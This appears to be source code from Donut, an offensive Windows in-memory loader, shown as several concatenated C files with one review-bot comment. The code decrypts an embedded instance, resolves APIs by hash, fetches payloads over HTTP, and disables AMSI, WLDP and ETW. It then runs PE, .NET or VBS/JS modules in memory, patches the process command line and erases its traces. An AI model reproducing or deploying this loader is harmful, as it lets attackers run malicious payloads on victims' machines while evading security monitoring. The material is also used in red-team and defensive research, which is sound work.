640 nt = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);
641 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
642 nt->FileHeader.SizeOfOptionalHeader);
643
644 // locate the .data segment, save VA and number of pointers
645 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
646 if(*(PDWORD)sh[i].Name == *(PDWORD)inst->dataname) {
647 ds = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
648 cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
649 break;
650 }
651 }
652
653 DPRINT("Searching %i pointers", cnt);
654
655 wcmd = inst->api.GetCommandLineW();
656
657 for(i=0; i<cnt; i++) {
658 wcs = (PUNICODE_STRING)&ds[i];
659 // skip if not equal
660 if(wcs->Buffer != wcmd) continue;
661 DPRINT("BaseUnicodeCommandLine found at %p:%p : %ws", &ds[i], wcs->Buffer, wcs->Buffer);
662 // overwrite buffer for GetCommandLineW
663 inst->api.RtlCreateUnicodeString(wcs, CommandLine);
664 DPRINT("GetCommandLineW() : %ws", GetCommandLineW());
665 break;
666 }
667
668 acmd = inst->api.GetCommandLineA();
669
670 for(i=0; i<cnt; i++) {
671 mbs = (PANSI_STRING)&ds[i];
672 // skip if not equal
673 if(mbs->Buffer != acmd) continue;
674 DPRINT("BaseAnsiCommandLine found at %p:%p : %s", &ds[i], mbs->Buffer, mbs->Buffer);
675 inst->api.RtlUnicodeStringToAnsiString(&ansi, wcs, TRUE);
676 Memcpy(&ds[i], &ansi, sizeof(ANSI_STRING));
677 DPRINT("GetCommandLineA() : %s", GetCommandLineA());
678 break;
679 }
680
681 ldr = (PPEB_LDR_DATA)peb->Ldr;
682
683 // for each DLL loaded
684 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
685 dte->DllBase != NULL;
686 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
687 {
688 // check for exported symbols and patch according to string type
689 str = (PCHAR)inst->cmd_syms;
690
691 for(;;) {
692 // reset flags
693 atype = 1; fptr = 0;
694 // store string until null byte or semi-colon encountered
695 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) {
696 // w indicates unicode type
697 if(str[i] == 'w') atype = 0;
698 // p indicates function pointer
699 if(str[i] == 'p') fptr = 1;
700 // store byte
701 sym[i] = str[i];
702 }
703 // nothing stored? end loop for this DLL
704 if(i == 0) break;
705 // skip name plus one for separator
706 str += (i + 1);
707 // store null terminator
708 sym[i] = '\0';
709 // see if it can be resolved for current module
710 addr = xGetProcAddress(inst, dte->DllBase, sym, 0);
711 // nothing resolve? get the next symbol from list
712 if(addr == NULL) continue;
713 // is this ansi?
714 if(atype) {
715 argv = (PCHAR*)addr;
716 // pointer?
717 if(fptr != 0) {
718 p_acmdln = (p_acmdln_t)addr;
719 argv = p_acmdln();
720 }
721 // anything to patch?
722 DPRINT("Checking %s", sym);
723 if(argv != NULL && IsHeapPtr(inst, *argv)) {
724 DPRINT("Setting %ws!%s \"%s\" to \"%s\"",
725 dte->BaseDllName.Buffer, sym, *argv, ansi.Buffer);
726 *argv = ansi.Buffer;
727 }
728 } else {
729 wargv = (PWCHAR*)addr;
730 // pointer?
731 if(fptr != 0) {
732 p_wcmdln = (p_wcmdln_t)addr;
733 wargv = p_wcmdln();
734 }
735 // anything to patch?
736 DPRINT("Checking %s", sym);
737 if(wargv != NULL && IsHeapPtr(inst, *wargv)) {
738 DPRINT("Setting %ws!%s \"%ws\" to \"%ws\"",
739 dte->BaseDllName.Buffer, sym, *wargv, wcs->Buffer);
740 *wargv = wcs->Buffer;
741 }
742 }
743 }
744 }
745 return TRUE;
746 }
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 VOID RunScript(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
32 HRESULT hr;
33 IActiveScriptParse *parser;
34 IActiveScript *engine;
35 MyIActiveScriptSite mas;
36 IActiveScriptSiteVtbl activescript_vtbl;
37 IActiveScriptSiteWindowVtbl siteWnd_vtbl;
38 IHostVtbl wscript_vtbl;
39 PWCHAR script;
40 ULONG64 len;
41 BSTR obj;
42 BOOL disabled;
43 WCHAR buf[DONUT_MAX_NAME+1];
44 SIZE_T rs;
45 NTSTATUS status;
46 PSYSCALL_LIST syscall_list;
47
48 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
49
50 // 1. Allocate memory for unicode format of script
51 rs = (inst->mod_len + 1) * sizeof(WCHAR);
52 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&script, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
53
54 // 2. Convert string to unicode.
55 if(NT_SUCCESS(status)) {
56 // 2. Convert string to unicode.
57 inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
58 -1, script, mod->len * sizeof(WCHAR));
59
60 // setup the IActiveScriptSite interface
61 mas.site.lpVtbl = (IActiveScriptSiteVtbl*)&activescript_vtbl;
62 ActiveScript_New(inst, &mas.site);
63
64 // setup the IActiveScriptSiteWindow interface for GUI stuff
65 mas.siteWnd.lpVtbl = (IActiveScriptSiteWindowVtbl*)&siteWnd_vtbl;
66 ActiveScriptSiteWindow_New(inst, &mas.siteWnd);
67
68 // setup the IHost interface for WScript object
69 mas.wscript.lpVtbl = (IHostVtbl*)&wscript_vtbl;
70 Host_New(inst, &mas.wscript);
71
72 // 4. Initialize COM, MyIActiveScriptSite
73 DPRINT("CoInitializeEx");
74 hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
75
76 if(hr == S_OK) {
77 // 5. Instantiate the active script engine
78 DPRINT("CoCreateInstance(IID_IActiveScript)");
79
80 hr = inst->api.CoCreateInstance(
81 &inst->xCLSID_ScriptLanguage, 0,
82 CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
83 &inst->xIID_IActiveScript, (void **)&engine);
84
85 if(hr == S_OK) {
86 // 6. Get IActiveScriptParse object from engine
87 DPRINT("IActiveScript::QueryInterface(IActiveScriptParse)");
88
89 hr = engine->lpVtbl->QueryInterface(
90 engine,
91 #ifdef _WIN64
92 &inst->xIID_IActiveScriptParse64,
93 #else
94 &inst->xIID_IActiveScriptParse32,
95 #endif
96 (void **)&parser);
97
98 if(hr == S_OK) {
99 // 7. Initialize parser
100 DPRINT("IActiveScriptParse::InitNew");
101 hr = parser->lpVtbl->InitNew(parser);
102
103 if(hr == S_OK) {
104 // 8. Set custom script interface
105 DPRINT("IActiveScript::SetScriptSite");
106 mas.wscript.lpEngine = engine;
107
108 hr = engine->lpVtbl->SetScriptSite(
109 engine, (IActiveScriptSite *)&mas);
110
111 if(hr == S_OK) {
112 DPRINT("IActiveScript::AddNamedItem(\"%s\")", inst->wscript);
113 ansi2unicode(inst, inst->wscript, buf);
114 obj = inst->api.SysAllocString(buf);
115 hr = engine->lpVtbl->AddNamedItem(engine, (LPCOLESTR)obj, SCRIPTITEM_ISVISIBLE);
116 inst->api.SysFreeString(obj);
117
118 if(hr == S_OK) {
119 // 9. Load script
120 DPRINT("IActiveScriptParse::ParseScriptText");
121 hr = parser->lpVtbl->ParseScriptText(
122 parser, (LPCOLESTR)script, NULL, NULL, NULL, 0, 0, 0, NULL, NULL);
123
124 if(hr == S_OK) {
125 // 10. Run script
126 DPRINT("IActiveScript::SetScriptState(SCRIPTSTATE_CONNECTED)");
127 hr = engine->lpVtbl->SetScriptState(
128 engine, SCRIPTSTATE_CONNECTED);
129
130 // SetScriptState blocks here
131 }
132 }
133 }
134 }
135 DPRINT("IActiveScriptParse::Release");
136 parser->lpVtbl->Release(parser);
137 }
138 DPRINT("IActiveScript::Close");
139 engine->lpVtbl->Close(engine);
140
141 DPRINT("IActiveScript::Release");
142 engine->lpVtbl->Release(engine);
143 }
144 }
145 DPRINT("Erasing script from memory");
146 Memset(script, 0, (inst->mod_len + 1) * sizeof(WCHAR));
147
148 DPRINT("NtFreeVirtualMemory(script)");
149 rs = 0;
150 status = NtFreeVirtualMemory(NtCurrentProcess(), (PVOID)&script, &rs, MEM_RELEASE, syscall_list);
151 DPRINT("NTSTATUS: 0x%lx", status);
152 }
153 }
154
155 #include "activescript.c"
156 #include "wscript.c"
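Review bot: In RunScript the output size passed to MultiByteToWideChar is `mod->len * sizeof(WCHAR)`, but that argument is a count of wide characters, not bytes, and the buffer was allocated from a different field as `(inst->mod_len + 1) * sizeof(WCHAR)` bytes. The stated capacity is therefore not tied to the allocation, and with a source length of -1 the conversion runs to the first NUL in `mod->data`, so nothing visible here keeps the write inside the buffer; how `mod->len` relates to `inst->mod_len` is defined outside this file. I would pass the capacity that was actually allocated, `-1, script, (int)(inst->mod_len + 1));`, and treat a return value of 0 as a failure before calling ParseScriptText. Separately, `script` is passed to NtAllocateVirtualMemory as the base address without being initialised, whereas the PE loader sets `shcp = NULL;` first; add `script = NULL;` before the allocation.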
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "loader.h"
32
33 DWORD MainProc(PDONUT_INSTANCE inst);
34
35 HANDLE DonutLoader(PDONUT_INSTANCE inst) {
36 CreateThread_t _CreateThread;
37 GetThreadContext_t _GetThreadContext;
38 GetCurrentThread_t _GetCurrentThread;
39 NtContinue_t _NtContinue;
40 ULONG64 hash;
41 HANDLE h = NULL;
42 CONTEXT c;
43
44 DPRINT("sizeof(DONUT_INSTANCE) : %zu\n", sizeof(DONUT_INSTANCE));
45 DPRINT("offsetof(DONUT_INSTANCE, api) : %zu\n", offsetof(DONUT_INSTANCE, api));
46
47 // create thread and execute original entrypoint?
48 if(inst->oep != 0) {
49 DPRINT("Resolving address of CreateThread");
50 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.CreateThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
51 _CreateThread = (CreateThread_t)xGetProcAddressByHash(inst, hash, inst->iv);
52
53 // api resolved?
54 if(_CreateThread != NULL) {
55 // create new thread
56 DPRINT("Creating new thread");
57 h = _CreateThread(NULL, 0, ADR(LPTHREAD_START_ROUTINE, MainProc), (LPVOID)inst, 0, NULL);
58 } else {
59 DPRINT("FAILED");
60 return (HANDLE)-1;
61 }
62
63 DPRINT("Resolving address of GetCurrentThread");
64 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.GetCurrentThread) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
65 _GetCurrentThread = (GetCurrentThread_t)xGetProcAddressByHash(inst, hash, inst->iv);
66
67 if(_NtContinue != NULL && _GetThreadContext != NULL && _GetCurrentThread != NULL) {
68 c.ContextFlags = CONTEXT_FULL;
69 _GetThreadContext(_GetCurrentThread(), &c);
70 #ifdef _WIN64
71 c.Rip = inst->oep;
72 c.Rsp &= -16;
73 #else
74 c.Eip = inst->oep;
75 c.Esp &= -4;
76 #endif
77 DPRINT("Calling NtContinue");
78 //__debugbreak();
79 _NtContinue(&c, FALSE);
80 }
81 } else {
82 // execute in existing thread
83 MainProc(inst);
84 }
85 return h;
86 }
87
88 DWORD MainProc(PDONUT_INSTANCE inst) {
89 ULONG i, ofs, wspace, fspace, len;
90 ULONG64 sig;
91 DONUT_ASSEMBLY assembly;
92 PDONUT_MODULE mod, unpck;
93 VirtualAlloc_t _VirtualAlloc;
94 VirtualFree_t _VirtualFree;
95 RtlExitUserProcess_t _RtlExitUserProcess;
96 LPVOID pv, ws;
97 ULONG64 hash;
98 BOOL disabled, term;
99 NTSTATUS nts;
100 PCHAR str;
101 CHAR path[MAX_PATH];
102 NTSTATUS status;
103 SIZE_T rs;
104 PSYSCALL_LIST syscall_list;
105
106 DPRINT("Maru IV : %" PRIX64, inst->iv);
107
108 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
109 DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
110 _VirtualAlloc = (VirtualAlloc_t)xGetProcAddressByHash(inst, hash, inst->iv);
111
112 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
113 DPRINT("Resolving address for VirtualFree() : %" PRIX64, hash);
114 _VirtualFree = (VirtualFree_t) xGetProcAddressByHash(inst, hash, inst->iv);
115
116 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.RtlExitUserProcess) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
117 DPRINT("Resolving address for RtlExitUserProcess() : %" PRIX64, hash);
118 _RtlExitUserProcess = (RtlExitUserProcess_t) xGetProcAddressByHash(inst, hash, inst->iv);
119
120 // failed to resolve any?
121 if(_VirtualAlloc == NULL ||
122 _VirtualFree == NULL ||
123 _RtlExitUserProcess == NULL)
124 {
125 DPRINT("FAILED!.");
126 return -1;
127 }
128
129 DPRINT("VirtualAlloc : %p VirtualFree : %p",
130 (LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
131
132 DPRINT("Allocating %i bytes of RW memory", inst->len);
133 pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
134
135 if(pv == NULL) {
136 DPRINT("Memory allocation failed...");
137 // terminate host process?
138 if(inst->exit_opt == DONUT_OPT_EXIT_PROCESS) {
139 DPRINT("Terminating host process");
140 _RtlExitUserProcess(0);
141 }
142 return -1;
143 }
144 DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
145 Memcpy(pv, inst, inst->len);
146 inst = (PDONUT_INSTANCE)pv;
147
148 DPRINT("Zero initializing PDONUT_ASSEMBLY");
149 Memset(&assembly, 0, sizeof(assembly));
150
151 // if encryption used
152 if(inst->entropy == DONUT_ENTROPY_DEFAULT) {
153 PBYTE inst_data;
154 // load pointer to data just past len + key
155 inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
156
157 DPRINT("Decrypting %li bytes of instance", inst->len - offsetof(DONUT_INSTANCE, api_cnt));
158
159 donut_decrypt(inst->key.mk,
160 inst->key.ctr,
161 inst_data,
162 inst->len - offsetof(DONUT_INSTANCE, api_cnt));
163
164 DPRINT("Generating hash to verify decryption");
165 ULONG64 mac = maru(inst->sig, inst->iv);
166 DPRINT("Instance : %"PRIX64" | Result : %"PRIX64, inst->mac, mac);
167
168 if(mac != inst->mac) {
169 DPRINT("Decryption of instance failed");
170 goto erase_memory;
171 }
172 }
173 DPRINT("Resolving LoadLibraryA");
174
175 inst->api.addr[0] = xGetProcAddressByHash(inst, inst->api.hash[0], inst->iv);
176 if(inst->api.addr[0] == NULL) return -1;
177
178 str = (PCHAR)inst->dll_names;
179
180 // load the DLL required
181 for(;;) {
182 // store string until null byte or semi-colon encountered
183 for(i=0; str[i] != '\0' && str[i] !=';' && i<MAX_PATH; i++) path[i] = str[i];
184 // nothing stored? exit loop
185 if(i == 0) break;
186 // skip name plus one for separator
187 str += (i + 1);
188 // store null terminator
189 path[i] = '\0';
190 xGetLibAddress(inst, path);
191 }
192
193 DPRINT("Resolving %i API", inst->api_cnt);
194
195 for(i=1; i<inst->api_cnt; i++) {
196 DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
197
198 inst->api.addr[i] = xGetProcAddressByHash(inst, inst->api.hash[i], inst->iv);
199
200 // if resolving API failed
201 if(inst->api.addr[i] == NULL) {
202 DPRINT("Failed to resolve an API");
203 // make an exception for CLRCreateInstance
204 // for older versions of dotnet
205 hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.CLRCreateInstance) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
206
207 if(inst->api.hash[i] == hash) {
208 DPRINT("CLRCreateInstance isn't available. Will try CorBindToRuntime.");
209 continue;
210 }
211 // else, bail out
212 goto erase_memory;
213 }
214 }
215
216 if(inst->type == DONUT_INSTANCE_HTTP) {
217 DPRINT("Module is stored on remote HTTP server.");
218 if(!DownloadFromHTTP(inst)) goto erase_memory;
219 mod = inst->module.p;
220 } else
221 if(inst->type == DONUT_INSTANCE_DNS) {
222 DPRINT("Module is stored on remote DNS server. (Currently unsupported)");
223 goto erase_memory;
224 //if(!DownloadFromDNS(inst)) goto erase_memory;
225 mod = inst->module.p;
226 } else
227 if(inst->type == DONUT_INSTANCE_EMBED) {
228 DPRINT("Module is embedded.");
229 mod = (PDONUT_MODULE)&inst->module.x;
230 }
231
232 DPRINT("Allocating the syscall table");
233 syscall_list = _VirtualAlloc(NULL, sizeof(SYSCALL_LIST), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
234 inst->syscall_list = (ULONG_PTR)syscall_list;
235 if (syscall_list == NULL) {
236 // terminate host process?
237 if(inst->exit_opt == DONUT_OPT_EXIT_PROCESS) {
238 DPRINT("Terminating host process");
239 _RtlExitUserProcess(0);
240 }
241 return -1;
242 }
243
244 // try bypassing AMSI and WLDP?
245 if(inst->bypass != DONUT_BYPASS_NONE) {
246 // Try to disable AMSI
247 disabled = DisableAMSI(inst);
248 DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
249 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
250 goto erase_memory;
251
252 // Try to disable WLDP
253 disabled = DisableWLDP(inst);
254 DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
255 if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
256 goto erase_memory;
257
258 // Try to disable ETW
259 disabled = DisableETW(inst);
260 DPRINT("DisableETW %s", disabled ? "OK" : "FAILED");
261 if (!disabled && inst->bypass == DONUT_BYPASS_ABORT)
262 goto erase_memory;
263 }
264
265 // module is compressed?
266 if(mod->compress != DONUT_COMPRESS_NONE) {
267 DPRINT("Compression engine is %"PRIx32, mod->compress);
268
269 DPRINT("Allocating %zd bytes of memory for decompressed file and module information",
270 mod->len + sizeof(DONUT_MODULE));
271
272 // allocate memory for module information + size of decompressed data
273 unpck = NULL;
274 rs = ((sizeof(DONUT_MODULE) + mod->len) + 4095) & -4096;
275 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&unpck, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
276
277 if(!NT_SUCCESS(status)) goto erase_memory;
278
279 // copy the existing information to new block
280 DPRINT("Duplicating DONUT_MODULE");
281 Memcpy(unpck, mod, sizeof(DONUT_MODULE));
282
283 // decompress module data into new block
284 DPRINT("Decompressing %"PRId32 " -> %"PRId32, mod->zlen, mod->len);
285
286 if(mod->compress == DONUT_COMPRESS_LZNT1 ||
287 mod->compress == DONUT_COMPRESS_XPRESS)
288 {
289 DPRINT("Decompressing with RtlDecompressBuffer(%s)",
290 mod->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" : "XPRESS");
291
292 nts = inst->api.RtlDecompressBuffer(
293 (mod->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
294 (PUCHAR)unpck->data, mod->len,
295 (PUCHAR)&mod->data, mod->zlen, &len);
296
297 if(nts == 0) {
298 // assign pointer to mod
299 mod = unpck;
300 } else {
301 DPRINT("RtlDecompressBuffer failed with %"PRIX32, nts);
302 goto erase_memory;
303 }
304 } else if(mod->compress == DONUT_COMPRESS_APLIB) {
305 DPRINT("Decompressing with aPLib");
306 aP_depack((PUCHAR)mod->data, (PUCHAR)unpck->data);
307 DPRINT("Done");
308 mod = unpck;
309 } else {
310 //
311 }
312 }
313 DPRINT("Checking type of module");
314
315 // unmanaged EXE/DLL?
316 if(mod->type == DONUT_MODULE_DLL ||
317 mod->type == DONUT_MODULE_EXE) {
318 RunPE(inst, mod);
319 } else
320 // .NET EXE/DLL?
321 if(mod->type == DONUT_MODULE_NET_DLL ||
322 mod->type == DONUT_MODULE_NET_EXE)
323 {
324 if(LoadAssembly(inst, mod, &assembly)) {
325 RunAssembly(inst, mod, &assembly);
326 }
327 FreeAssembly(inst, &assembly);
328 } else
329 // vbs or js?
330 if(mod->type == DONUT_MODULE_VBS ||
331 mod->type == DONUT_MODULE_JS)
332 {
333 RunScript(inst, mod);
334 }
335
336 erase_memory:
337 // if module was downloaded
338 if(inst->type == DONUT_INSTANCE_HTTP ||
339 inst->type == DONUT_INSTANCE_DNS)
340 {
341 if(inst->module.p != NULL) {
342 // overwrite memory with zeros
343 Memset(inst->module.p, 0, (DWORD)inst->mod_len);
344
345 // free memory
346 rs = 0;
347 NtFreeVirtualMemory(NtCurrentProcess(), (PVOID)&inst->module.p, &rs, MEM_RELEASE, syscall_list);
348 inst->module.p = NULL;
349 }
350 }
351
352 // should we call RtlExitUserProcess?
353 term = (BOOL) (inst->exit_opt == DONUT_OPT_EXIT_PROCESS);
354
355 DPRINT("Erasing RW memory for instance");
356 Memset(inst, 0, inst->len);
357
358 DPRINT("Releasing RW memory for instance");
359 _VirtualFree((PVOID)(ULONG_PTR)inst->syscall_list, 0, MEM_DECOMMIT | MEM_RELEASE);
360 _VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
361
362 if(term) {
363 DPRINT("Terminating host process");
364 // terminate host process
365 _RtlExitUserProcess(0);
366 }
367 DPRINT("Returning to caller");
368 // return to caller, which invokes RtlExitUserThread
369 return 0;
370 }
371
372 int ansi2unicode(PDONUT_INSTANCE inst, CHAR input[], WCHAR output[DONUT_MAX_NAME]) {
373 return inst->api.MultiByteToWideChar(CP_ACP, 0, input,
374 -1, output, DONUT_MAX_NAME);
375 }
376
377 #include "peb.c" // resolve functions in export table
378 #include "http_client.c" // Download module from HTTP server
379 //#include "dns_client.c" // Download module from DNS server
380 #include "inmem_dotnet.c" // .NET assemblies
381 #include "inmem_pe.c" // Unmanaged PE/DLL files
382 #include "inmem_script.c" // VBS/JS files
383
384 #include "bypass.c" // Bypass AMSI and WLDP
385 #include "getpc.c" // code stub to return program counter (always at the end!)
386
387 // the following code is *only* for development purposes
388 // given an instance file, it will run as if running on a target system
389 // attach a debugger to host process
390 #ifdef DEBUG
391
392 #include <stdio.h>
393 #include <string.h>
394 #include <stdlib.h>
395 #include <sys/stat.h>
396
397 int main(int argc, char *argv[]) {
398 FILE *fd;
399 struct stat fs;
400 PDONUT_INSTANCE inst;
401 DWORD old;
402 HANDLE h;
403
404 if(argc != 2) {
405 printf(" [ usage: loader <instance>\n");
406 return 0;
407 }
408 // get size of instance
409 if(stat(argv[1], &fs) != 0) {
410 printf(" [ unable to obtain size of instance.\n");
411 return 0;
412 }
413
414 // zero size?
415 if(fs.st_size == 0) {
416 printf(" [ invalid instance.\n");
417 return 0;
418 }
419
420 // try open for reading
421 fd = fopen(argv[1], "rb");
422 if(fd == NULL) {
423 printf(" [ unable to open %s.\n", argv[1]);
424 return 0;
425 }
426
427 // allocate memory
428 inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
429
430 if(inst != NULL) {
431 fread(inst, 1, fs.st_size, fd);
432
433 printf("Running...");
434
435 // run payload with instance
436 h = DonutLoader(inst);
437
438 if(h != (HANDLE)-1 && inst->oep != 0) {
439 printf("\nWaiting...");
440 WaitForSingleObject(h, INFINITE);
441 }
442 // deallocate
443 VirtualFree((LPVOID)(ULONG_PTR)inst->syscall_list, 0, MEM_DECOMMIT | MEM_RELEASE);
444 VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
445 }
446 fclose(fd);
447
448 system("pause");
449 return 0;
450 }
451 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef LOADER_H
32 #define LOADER_H
33
34 #if !defined(_MSC_VER)
35 #define __out_ecount_full(x)
36 #define __out_ecount_full_opt(x)
37 #include <inttypes.h>
38 #endif
39
40 #include <windows.h>
41 #include <wincrypt.h>
42 #include <oleauto.h>
43 #include <objbase.h>
44 #include <wininet.h>
45 #include <shlwapi.h>
46
47 #pragma comment(lib, "wininet.lib")
48 #pragma comment(lib, "advapi32.lib")
49 #pragma comment(lib, "crypt32.lib")
50 #pragma comment(lib, "ole32.lib")
51 #pragma comment(lib, "shlwapi.lib")
52 #pragma comment(lib, "shell32.lib")
53
54 #if defined(DEBUG)
55 #include <stdio.h>
56 #include <string.h>
57
58 #define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
59
60 #define DPRINT(...) { \
61 fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
62 fprintf(stderr, __VA_ARGS__); \
63 }
64 #else
65 #define DPRINT(...) // Don't do anything in release builds
66 #endif
67
68 #define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
69 (__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
70 (__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
71
72 // Relative Virtual Address to Virtual Address
73 #define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
74
